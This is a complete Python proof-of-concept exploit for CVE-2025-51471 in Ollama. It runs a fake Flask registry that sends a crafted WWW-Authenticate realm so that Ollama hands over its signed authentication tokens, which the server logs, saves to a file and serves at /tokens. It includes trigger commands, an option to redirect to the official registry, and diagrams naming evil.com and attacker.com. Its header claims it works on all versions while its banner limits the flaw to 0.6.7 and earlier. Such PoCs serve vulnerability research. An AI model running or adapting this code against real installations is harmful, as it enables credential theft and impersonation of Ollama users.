#!/usr/bin/env python3 """CVE-2025-51471 - Ollama Token Theft PoC (works on all Ollama versions)""" # Author: ajtazer import argparse import json import logging import sys import os import ssl import subprocess import tempfile from datetime import datetime from typing import Dict, List, Any, Optional from dataclasses import dataclass, asdict from flask import Flask, request, Response, jsonify # ═══════════════════════════════════════════════════════════════════════════════ # ANSI COLOR CODES FOR TERMINAL OUTPUT # ═══════════════════════════════════════════════════════════════════════════════ class Colors: """ANSI color codes for pretty terminal output.""" RESET = "\033[0m" BOLD = "\033[1m" DIM = "\033[2m" UNDERLINE = "\033[4m" # Regular colors RED = "\033[31m" GREEN = "\033[32m" YELLOW = "\033[33m" BLUE = "\033[34m" PURPLE = "\033[35m" CYAN = "\033[36m" WHITE = "\033[37m" # Bright colors BRIGHT_RED = "\033[91m" BRIGHT_GREEN = "\033[92m" BRIGHT_YELLOW = "\033[93m" BRIGHT_BLUE = "\033[94m" BRIGHT_PURPLE = "\033[95m" BRIGHT_CYAN = "\033[96m" # Background colors BG_RED = "\033[41m" BG_GREEN = "\033[42m" BG_YELLOW = "\033[43m" # ═══════════════════════════════════════════════════════════════════════════════ # DATA STRUCTURES # ═══════════════════════════════════════════════════════════════════════════════ @dataclass class StolenToken: """Represents a captured authentication token with full metadata.""" timestamp: str authorization: str method: str path: str remote_addr: str user_agent: Optional[str] headers: Dict[str, str] query_params: Dict[str, str] def to_dict(self) -> Dict[str, Any]: return asdict(self) @dataclass class ServerConfig: """Server configuration settings.""" port: int = 8080 capture_url: Optional[str] = None log_file: str = "stolen_tokens.json" steal_official: bool = False verbose: bool = True def __post_init__(self): if self.capture_url is None: self.capture_url = f"http://localhost:{self.port}/v2/token" # ═══════════════════════════════════════════════════════════════════════════════ # GLOBAL STATE # ═══════════════════════════════════════════════════════════════════════════════ app = Flask(__name__) config: ServerConfig = ServerConfig() stolen_tokens: List[StolenToken] = [] request_counter: int = 0 # ═══════════════════════════════════════════════════════════════════════════════ # LOGGING & OUTPUT UTILITIES # ═══════════════════════════════════════════════════════════════════════════════ def print_banner(): """Print the exploit banner with vulnerability information.""" banner = f""" {Colors.BRIGHT_CYAN}╔═══════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ {Colors.BRIGHT_RED}██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ███████╗ {Colors.BRIGHT_CYAN}║ ║ {Colors.BRIGHT_RED}██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██╔════╝ {Colors.BRIGHT_CYAN}║ ║ {Colors.BRIGHT_RED}██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████╗ {Colors.BRIGHT_CYAN}║ ║ {Colors.BRIGHT_RED}██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║ {Colors.BRIGHT_CYAN}║ ║ {Colors.BRIGHT_RED}╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗███████║ {Colors.BRIGHT_CYAN}║ ║ {Colors.BRIGHT_RED} ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚══════╝ {Colors.BRIGHT_CYAN}║ ║ ║ ║ {Colors.BRIGHT_YELLOW} ┌─────────────────────────────────────┐ {Colors.BRIGHT_CYAN}║ ║ {Colors.BRIGHT_YELLOW} │ OLLAMA TOKEN THEFT PoC (v0.6.7) │ {Colors.BRIGHT_CYAN}║ ║ {Colors.BRIGHT_YELLOW} │ Cross-Domain Token Exposure │ {Colors.BRIGHT_CYAN}║ ║ {Colors.BRIGHT_YELLOW} └─────────────────────────────────────┘ {Colors.BRIGHT_CYAN}║ ║ ║ ╠═══════════════════════════════════════════════════════════════════════════════╣ ║ {Colors.WHITE}Affected:{Colors.RESET} Ollama <= 0.6.7 {Colors.BRIGHT_CYAN}║ ║ {Colors.WHITE}CVSS Score:{Colors.RESET} 6.9 (Medium) - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N{Colors.BRIGHT_CYAN}║ ║ {Colors.WHITE}CWE:{Colors.RESET} CWE-345 (Insufficient Verification of Data Authenticity) {Colors.BRIGHT_CYAN}║ ║ {Colors.WHITE}Component:{Colors.RESET} server.auth.getAuthorizationToken {Colors.BRIGHT_CYAN}║ ╚═══════════════════════════════════════════════════════════════════════════════╝{Colors.RESET} """ print(banner) def print_attack_flow(): """Print a visual representation of the attack flow.""" flow = f""" {Colors.BRIGHT_YELLOW}┌─────────────────────────────────────────────────────────────────────────────┐ │ ATTACK FLOW DIAGRAM │ └─────────────────────────────────────────────────────────────────────────────┘{Colors.RESET} {Colors.CYAN}┌─────────────┐{Colors.RESET} {Colors.RED}┌──────────────────┐{Colors.RESET} {Colors.CYAN}│ VICTIM │{Colors.RESET} {Colors.RED}│ MALICIOUS SERVER │{Colors.RESET} {Colors.CYAN}│ (Ollama) │{Colors.RESET} {Colors.RED}│ (This PoC) │{Colors.RESET} {Colors.CYAN}└──────┬──────┘{Colors.RESET} {Colors.RED}└────────┬─────────┘{Colors.RESET} │ │ │ {Colors.GREEN}1. ollama pull evil.com/model{Colors.RESET} │ ├────────────────────────────────────────────────────► │ │ │ {Colors.YELLOW}2. HTTP 401 Unauthorized{Colors.RESET} │ │ {Colors.YELLOW}WWW-Authenticate: Bearer{Colors.RESET} │ │ {Colors.RED}realm="https://attacker.com/steal-token"{Colors.RESET} │ ◄────────────────────────────────────────────────────┤ │ │ │ {Colors.BRIGHT_RED}3. Ollama follows realm WITHOUT validation!{Colors.RESET} │ │ {Colors.BRIGHT_RED}Sends Ed25519 signed token to attacker{Colors.RESET} │ ├────────────────────────────────────────────────────► │ │ │ {Colors.BG_RED}{Colors.WHITE} TOKEN CAPTURED! {Colors.RESET} │ │ │ ▼ ▼ """ print(flow) def print_section(title: str, color: str = Colors.BRIGHT_CYAN): """Print a section header.""" width = 77 print(f"\n{color}{'═' * width}") print(f" {title}") print(f"{'═' * width}{Colors.RESET}\n") def print_info(label: str, value: str, indent: int = 4): """Print an info line with label and value.""" spaces = " " * indent print(f"{spaces}{Colors.DIM}├──{Colors.RESET} {Colors.YELLOW}{label}:{Colors.RESET} {value}") def print_last_info(label: str, value: str, indent: int = 4): """Print the last info line in a section.""" spaces = " " * indent print(f"{spaces}{Colors.DIM}└──{Colors.RESET} {Colors.YELLOW}{label}:{Colors.RESET} {value}") def print_headers(headers: Dict[str, str], indent: int = 8): """Print HTTP headers in a formatted way.""" spaces = " " * indent items = list(headers.items()) for i, (key, value) in enumerate(items): prefix = "└──" if i == len(items) - 1 else "├──" # Truncate long values display_value = value if len(value) < 60 else value[:57] + "..." print(f"{spaces}{Colors.DIM}{prefix}{Colors.RESET} {Colors.BLUE}{key}:{Colors.RESET} {display_value}") def log_stolen_token(token: StolenToken): """Log a stolen token with detailed output.""" global stolen_tokens stolen_tokens.append(token) # Calculate token number token_num = len(stolen_tokens) # Print capture notification print(f"\n{Colors.BG_RED}{Colors.WHITE}{Colors.BOLD}") print(" ╔═══════════════════════════════════════════════════════════════════════╗") print(f" ║ 🔓 TOKEN #{token_num} CAPTURED! 🔓 ║") print(" ╚═══════════════════════════════════════════════════════════════════════╝") print(f"{Colors.RESET}\n") # Token details print(f" {Colors.BRIGHT_GREEN}┌─────────────────────────────────────────────────────────────────────┐{Colors.RESET}") print(f" {Colors.BRIGHT_GREEN}│{Colors.RESET} {Colors.BOLD}STOLEN TOKEN DETAILS{Colors.RESET} {Colors.BRIGHT_GREEN}│{Colors.RESET}") print(f" {Colors.BRIGHT_GREEN}└─────────────────────────────────────────────────────────────────────┘{Colors.RESET}") print_info("Timestamp", token.timestamp) print_info("Remote Address", token.remote_addr) print_info("HTTP Method", token.method) print_info("Request Path", token.path) print_info("User-Agent", token.user_agent or "N/A") print() # The prize - the authorization token print(f" {Colors.BRIGHT_RED}┌─────────────────────────────────────────────────────────────────────┐{Colors.RESET}") print(f" {Colors.BRIGHT_RED}│{Colors.RESET} {Colors.BOLD}AUTHORIZATION TOKEN (Ed25519 Signed){Colors.RESET} {Colors.BRIGHT_RED}│{Colors.RESET}") print(f" {Colors.BRIGHT_RED}└─────────────────────────────────────────────────────────────────────┘{Colors.RESET}") # Split token for readability if it's long auth_token = token.authorization if len(auth_token) > 70: print(f"\n {Colors.GREEN}{auth_token[:70]}{Colors.RESET}") remaining = auth_token[70:] while remaining: print(f" {Colors.GREEN}{remaining[:70]}{Colors.RESET}") remaining = remaining[70:] else: print(f"\n {Colors.GREEN}{auth_token}{Colors.RESET}") print() # Headers if verbose if config.verbose and token.headers: print(f" {Colors.CYAN}┌─────────────────────────────────────────────────────────────────────┐{Colors.RESET}") print(f" {Colors.CYAN}│{Colors.RESET} {Colors.BOLD}ALL REQUEST HEADERS{Colors.RESET} {Colors.CYAN}│{Colors.RESET}") print(f" {Colors.CYAN}└─────────────────────────────────────────────────────────────────────┘{Colors.RESET}") print_headers(token.headers) print(f"\n{'─' * 77}\n") # File logging if config.log_file: try: with open(config.log_file, "a") as f: json.dump(token.to_dict(), f, indent=2) f.write("\n---\n") if config.verbose: print(f" {Colors.DIM}[✓] Token saved to {config.log_file}{Colors.RESET}\n") except Exception as e: print(f" {Colors.RED}[✗] Error writing to log file: {e}{Colors.RESET}\n") def log_request(method: str, path: str, remote_addr: str, description: str, color: str = Colors.BLUE): """Log an incoming request with details.""" global request_counter request_counter += 1 timestamp = datetime.now().strftime("%H:%M:%S.%f")[:-3] print(f"\n{color}┌─ REQUEST #{request_counter} {'─' * 60}{Colors.RESET}") print(f"{color}│{Colors.RESET} {Colors.DIM}[{timestamp}]{Colors.RESET} {Colors.BOLD}{method}{Colors.RESET} {path}") print(f"{color}│{Colors.RESET} {Colors.DIM}From:{Colors.RESET} {remote_addr}") print(f"{color}│{Colors.RESET} {Colors.DIM}Description:{Colors.RESET} {description}") print(f"{color}└{'─' * 70}{Colors.RESET}") # ═══════════════════════════════════════════════════════════════════════════════ # FLASK ROUTE HANDLERS # ═══════════════════════════════════════════════════════════════════════════════ @app.route('/v2/', defaults={'path': ''}) @app.route('/v2/') def registry_handler(path): """ Handle requests to the fake OCI/Docker registry. This endpoint simulates a malicious registry that exploits CVE-2025-51471 by returning a 401 response with a crafted WWW-Authenticate header containing a malicious realm URL. ATTACK MECHANISM: 1. Ollama sends a request to pull a model 2. We return 401 with WWW-Authenticate header pointing to our token capture endpoint 3. Ollama (vulnerable version) follows the realm URL without domain validation 4. We capture the Ed25519 signed authentication token """ log_request( request.method, request.url, request.remote_addr, "Fake registry request - checking for auth token", Colors.BLUE ) # Verbose header logging if config.verbose: print(f"\n {Colors.DIM}Request Headers:{Colors.RESET}") for key, value in request.headers: print(f" {Colors.DIM}•{Colors.RESET} {key}: {value[:50]}{'...' if len(value) > 50 else ''}") # Check for Authorization header auth_header = request.headers.get('Authorization') if auth_header: # 🎯 TOKEN RECEIVED! This is the payload we're after! print(f"\n {Colors.BRIGHT_GREEN}[★] Authorization header detected!{Colors.RESET}") print(f" {Colors.BRIGHT_GREEN}[★] Preparing to capture token...{Colors.RESET}") token = StolenToken( timestamp=datetime.now().isoformat(), authorization=auth_header, method=request.method, path=request.url, remote_addr=request.remote_addr, user_agent=request.headers.get('User-Agent'), headers=dict(request.headers), query_params=dict(request.args) ) log_stolen_token(token) # Return 418 I'm a teapot as an indicator that capture succeeded # This is a fun Easter egg status code that clearly shows the PoC worked return Response( json.dumps({ "message": "Token captured successfully", "status": "pwned", "token_number": len(stolen_tokens) }, indent=2), status=418, content_type='application/json' ) # No auth header - this is the initial request # Send 401 with malicious WWW-Authenticate header print(f"\n {Colors.YELLOW}[!] No Authorization header found{Colors.RESET}") print(f" {Colors.YELLOW}[!] Sending malicious WWW-Authenticate response...{Colors.RESET}") # Determine the realm URL if config.steal_official: realm = "https://registry.ollama.ai/v2/token" print(f"\n {Colors.BRIGHT_RED}[⚠] STEALING OFFICIAL OLLAMA REGISTRY TOKENS!{Colors.RESET}") print(f" {Colors.BRIGHT_RED}[⚠] Redirecting auth to: {realm}{Colors.RESET}") else: realm = config.capture_url print(f"\n {Colors.PURPLE}[→] Redirecting auth to our capture endpoint:{Colors.RESET}") print(f" {Colors.PURPLE} {realm}{Colors.RESET}") # Craft the malicious WWW-Authenticate header # This is the heart of the exploit - Ollama will follow this realm URL blindly www_auth = f'Bearer realm="{realm}",service="ollama",scope="repository:malicious/model:pull"' print(f"\n {Colors.CYAN}[→] WWW-Authenticate header:{Colors.RESET}") print(f" {Colors.CYAN} {www_auth}{Colors.RESET}") # Craft a realistic-looking registry error response error_response = { "errors": [{ "code": "UNAUTHORIZED", "message": "authentication required", "detail": { "reason": "access to the requested resource is not authorized", "realm": realm } }] } response = Response( json.dumps(error_response, indent=2), status=401, content_type='application/json' ) response.headers['WWW-Authenticate'] = www_auth response.headers['Docker-Distribution-Api-Version'] = 'registry/2.0' print(f"\n {Colors.GREEN}[✓] 401 response sent with malicious realm{Colors.RESET}") print(f" {Colors.DIM}[...] Waiting for Ollama to follow the redirect...{Colors.RESET}") return response @app.route('/steal-token') @app.route('/token') @app.route('/v2/token') def token_capture_handler(): """ Token capture endpoint. This is where Ollama sends the signed Ed25519 authentication token after following our malicious realm URL. The token is in the Authorization header and contains: - The user's identity - Ed25519 signature - Scope information With this token, an attacker could: - Access private models the victim has access to - Push malicious models under the victim's identity - Impersonate the victim on registry.ollama.ai """ log_request( request.method, request.url, request.remote_addr, "🎯 TOKEN CAPTURE ENDPOINT HIT!", Colors.BRIGHT_GREEN ) auth_header = request.headers.get('Authorization') if auth_header: print(f"\n {Colors.BG_GREEN}{Colors.WHITE} SUCCESS! Token received at capture endpoint! {Colors.RESET}") token = StolenToken( timestamp=datetime.now().isoformat(), authorization=auth_header, method=request.method, path=request.url, remote_addr=request.remote_addr, user_agent=request.headers.get('User-Agent'), headers=dict(request.headers), query_params=dict(request.args) ) log_stolen_token(token) else: print(f"\n {Colors.YELLOW}[!] Request received but no Authorization header{Colors.RESET}") print(f" {Colors.DIM} This might be a probe or the attack flow wasn't triggered{Colors.RESET}") # Return 401 - the token capture is complete # We don't need to return a valid token since we already captured what we need return jsonify({ "error": "token_capture_complete", "message": "Your token has been captured. This is a PoC for CVE-2025-51471.", "captured_tokens": len(stolen_tokens) }), 401 @app.route('/health') def health_handler(): """Health check endpoint for monitoring.""" return jsonify({ "status": "running", "vulnerability": "CVE-2025-51471", "affected_version": "Ollama <= 0.6.7", "tokens_captured": len(stolen_tokens), "total_requests": request_counter, "server_time": datetime.now().isoformat(), "config": { "port": config.port, "capture_url": config.capture_url, "steal_official": config.steal_official, "verbose": config.verbose } }) @app.route('/tokens') def tokens_handler(): """Return all captured tokens (for analysis).""" return jsonify({ "total": len(stolen_tokens), "tokens": [t.to_dict() for t in stolen_tokens] }) @app.route('/') def index_handler(): """Root endpoint with usage information.""" return Response(f""" ╔═══════════════════════════════════════════════════════════════════════════════╗ ║ CVE-2025-51471 - Ollama Token Theft PoC ║ ║ Cross-Domain Authentication Token Exposure Server ║ ╚═══════════════════════════════════════════════════════════════════════════════╝ STATUS: RUNNING TOKENS CAPTURED: {len(stolen_tokens)} REQUESTS HANDLED: {request_counter} ENDPOINTS: /v2/* - Fake registry (triggers exploit) /v2/token - Token capture endpoint /steal-token - Alternative token capture endpoint /tokens - View all captured tokens (JSON) /health - Server health check EXPLOIT TRIGGER: curl http://localhost:11434/api/pull -d '{{"model": "http://localhost:{config.port}/malicious/model"}}' OR ollama pull localhost:{config.port}/malicious/model For more information, see: https://github.com/ollama/ollama/pull/10750 """, content_type='text/plain') # ═══════════════════════════════════════════════════════════════════════════════ # SSL CERTIFICATE GENERATION # ═══════════════════════════════════════════════════════════════════════════════ def generate_self_signed_cert(cert_dir: str = None) -> tuple: """ Generate a self-signed SSL certificate for HTTPS server. Ollama requires HTTPS for registry connections, so we need to create a self-signed certificate to serve as a malicious HTTPS registry. Returns: tuple: (cert_path, key_path) """ if cert_dir is None: cert_dir = tempfile.mkdtemp(prefix="cve-2025-51471-") cert_path = os.path.join(cert_dir, "server.crt") key_path = os.path.join(cert_dir, "server.key") print(f"\n{Colors.YELLOW}[*] Generating self-signed SSL certificate...{Colors.RESET}") # Generate self-signed certificate using openssl try: # Generate private key and certificate in one command cmd = [ "openssl", "req", "-x509", "-newkey", "rsa:4096", "-keyout", key_path, "-out", cert_path, "-days", "365", "-nodes", # No passphrase "-subj", "/CN=localhost/O=CVE-2025-51471-PoC/C=US", "-addext", "subjectAltName=DNS:localhost,IP:127.0.0.1" ] result = subprocess.run( cmd, capture_output=True, text=True ) if result.returncode != 0: # Try without -addext for older OpenSSL versions cmd = [ "openssl", "req", "-x509", "-newkey", "rsa:2048", "-keyout", key_path, "-out", cert_path, "-days", "365", "-nodes", "-subj", "/CN=localhost/O=CVE-2025-51471-PoC/C=US" ] result = subprocess.run(cmd, capture_output=True, text=True) if result.returncode != 0: raise Exception(f"OpenSSL failed: {result.stderr}") print(f"{Colors.GREEN}[✓] SSL certificate generated successfully{Colors.RESET}") print(f"{Colors.DIM} ├── Certificate: {cert_path}{Colors.RESET}") print(f"{Colors.DIM} └── Private Key: {key_path}{Colors.RESET}") return cert_path, key_path except FileNotFoundError: print(f"{Colors.RED}[✗] OpenSSL not found! Please install OpenSSL.{Colors.RESET}") print(f"{Colors.YELLOW}[!] Falling back to HTTP mode (may not work with Ollama){Colors.RESET}") return None, None except Exception as e: print(f"{Colors.RED}[✗] Failed to generate certificate: {e}{Colors.RESET}") print(f"{Colors.YELLOW}[!] Falling back to HTTP mode (may not work with Ollama){Colors.RESET}") return None, None # ═══════════════════════════════════════════════════════════════════════════════ # MAIN ENTRY POINT # ═══════════════════════════════════════════════════════════════════════════════ def main(): global config parser = argparse.ArgumentParser( description='CVE-2025-51471 - Ollama Token Theft PoC Server', formatter_class=argparse.RawDescriptionHelpFormatter, epilog=""" EXAMPLES: # Basic usage (localhost token capture) python3 malicious_registry.py # Custom port python3 malicious_registry.py --port 9000 # Steal official Ollama registry tokens python3 malicious_registry.py --steal-official # Minimal output python3 malicious_registry.py --no-verbose MORE INFORMATION: Vulnerability: CVE-2025-51471 Affected: Ollama <= 0.6.7 Fix: https://github.com/ollama/ollama/pull/10750 """ ) parser.add_argument( '--port', '-p', type=int, default=8080, help='Port to listen on (default: 8080)' ) parser.add_argument( '--capture-url', '-c', type=str, default=None, help='URL for token capture endpoint (default: http://localhost:PORT/v2/token)' ) parser.add_argument( '--log', '-l', type=str, default='stolen_tokens.json', help='File to log stolen tokens (default: stolen_tokens.json)' ) parser.add_argument( '--steal-official', '-s', action='store_true', help='Redirect to steal registry.ollama.ai tokens (DANGEROUS)' ) parser.add_argument( '--verbose', '-v', action='store_true', default=True, help='Enable verbose output (default: True)' ) parser.add_argument( '--no-verbose', action='store_true', help='Disable verbose output' ) parser.add_argument( '--no-ssl', action='store_true', help='Disable HTTPS (use HTTP only - may not work with Ollama)' ) parser.add_argument( '--insecure', action='store_true', help='Same as --no-ssl' ) args = parser.parse_args() use_ssl = not (args.no_ssl or args.insecure) protocol = "https" if use_ssl else "http" # Build configuration config = ServerConfig( port=args.port, capture_url=args.capture_url or f"{protocol}://localhost:{args.port}/v2/token", log_file=args.log, steal_official=args.steal_official, verbose=not args.no_verbose ) # Print banner and info print_banner() print_attack_flow() # Generate SSL certificate if needed cert_path, key_path = None, None if use_ssl: cert_path, key_path = generate_self_signed_cert() if cert_path is None: use_ssl = False protocol = "http" config.capture_url = f"http://localhost:{config.port}/v2/token" print_section("SERVER CONFIGURATION") print(f" {Colors.DIM}┌{'─' * 68}┐{Colors.RESET}") print_info("Listen Port", str(config.port)) print_info("Protocol", f"{Colors.GREEN}HTTPS (SSL){Colors.RESET}" if use_ssl else f"{Colors.YELLOW}HTTP{Colors.RESET}") print_info("Token Capture URL", config.capture_url) print_info("Log File", config.log_file) print_info("Steal Official Tokens", f"{Colors.RED}YES{Colors.RESET}" if config.steal_official else f"{Colors.GREEN}NO{Colors.RESET}") print_last_info("Verbose Mode", f"{Colors.GREEN}ON{Colors.RESET}" if config.verbose else f"{Colors.YELLOW}OFF{Colors.RESET}") print(f" {Colors.DIM}└{'─' * 68}┘{Colors.RESET}") if config.steal_official: print(f"\n{Colors.BG_RED}{Colors.WHITE}{Colors.BOLD}") print(" ⚠️ WARNING: STEALING OFFICIAL OLLAMA REGISTRY TOKENS!") print(" ⚠️ This will redirect auth flows to registry.ollama.ai") print(" ⚠️ Use responsibly and only for authorized security testing!") print(f"{Colors.RESET}") if use_ssl: print(f"\n{Colors.YELLOW}[!] IMPORTANT: Ollama needs to trust our self-signed certificate.{Colors.RESET}") print(f"{Colors.YELLOW} You may need to add the certificate to your system trust store,{Colors.RESET}") print(f"{Colors.YELLOW} OR restart this server with --no-ssl and use ollama's --insecure flag.{Colors.RESET}") print_section("ATTACK INSTRUCTIONS") if use_ssl: print(f""" {Colors.BRIGHT_RED}⚠️ HTTPS MODE - Certificate trust required{Colors.RESET} {Colors.YELLOW}Option A:{Colors.RESET} Add the generated cert to your system keychain (macOS/Linux) {Colors.YELLOW}Option B (RECOMMENDED):{Colors.RESET} Use HTTP mode instead: {Colors.CYAN}$ python3 malicious_registry.py --no-ssl{Colors.RESET} Then: {Colors.CYAN}$ ollama pull --insecure localhost:{config.port}/malicious/model{Colors.RESET} """) else: print(f""" {Colors.BRIGHT_GREEN}✓ HTTP MODE - Use --insecure flag with ollama{Colors.RESET} {Colors.YELLOW}1.{Colors.RESET} Ensure Ollama is running: {Colors.CYAN}$ ollama serve{Colors.RESET} {Colors.YELLOW}2.{Colors.RESET} Trigger the vulnerability using the --insecure flag: {Colors.BOLD}Method A - Using ollama CLI (RECOMMENDED):{Colors.RESET} {Colors.CYAN}$ ollama pull --insecure localhost:{config.port}/malicious/model{Colors.RESET} {Colors.BOLD}Method B - Using curl API:{Colors.RESET} {Colors.CYAN}$ curl http://localhost:11434/api/pull -d '{{"model": "localhost:{config.port}/malicious/model", "insecure": true}}'{Colors.RESET} {Colors.YELLOW}3.{Colors.RESET} Watch this terminal for captured tokens! {Colors.YELLOW}4.{Colors.RESET} View all captured tokens: {Colors.CYAN}$ curl http://localhost:{config.port}/tokens{Colors.RESET} """) print_section(f"SERVER STARTING ON PORT {config.port} ({protocol.upper()})") print(f" {Colors.GREEN}🚀 Malicious registry server is now running!{Colors.RESET}") print(f" {Colors.GREEN}📡 Listening on: {protocol}://0.0.0.0:{config.port}{Colors.RESET}") print(f" {Colors.DIM}Press Ctrl+C to stop{Colors.RESET}") print(f"\n{'═' * 77}\n") # Disable Flask's default logging for cleaner output log = logging.getLogger('werkzeug') log.setLevel(logging.ERROR) # Suppress Flask startup message cli = sys.modules.get('flask.cli') if cli: cli.show_server_banner = lambda *args: None try: if use_ssl and cert_path and key_path: # Run with HTTPS context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) context.load_cert_chain(cert_path, key_path) app.run(host='0.0.0.0', port=config.port, debug=False, threaded=True, ssl_context=context) else: # Run with HTTP app.run(host='0.0.0.0', port=config.port, debug=False, threaded=True) except KeyboardInterrupt: print(f"\n\n{Colors.YELLOW}[!] Server shutting down...{Colors.RESET}") print(f"{Colors.GREEN}[✓] Total tokens captured: {len(stolen_tokens)}{Colors.RESET}") if stolen_tokens: print(f"{Colors.GREEN}[✓] Tokens saved to: {config.log_file}{Colors.RESET}") print(f"{Colors.DIM}Goodbye!{Colors.RESET}\n") if __name__ == '__main__': main()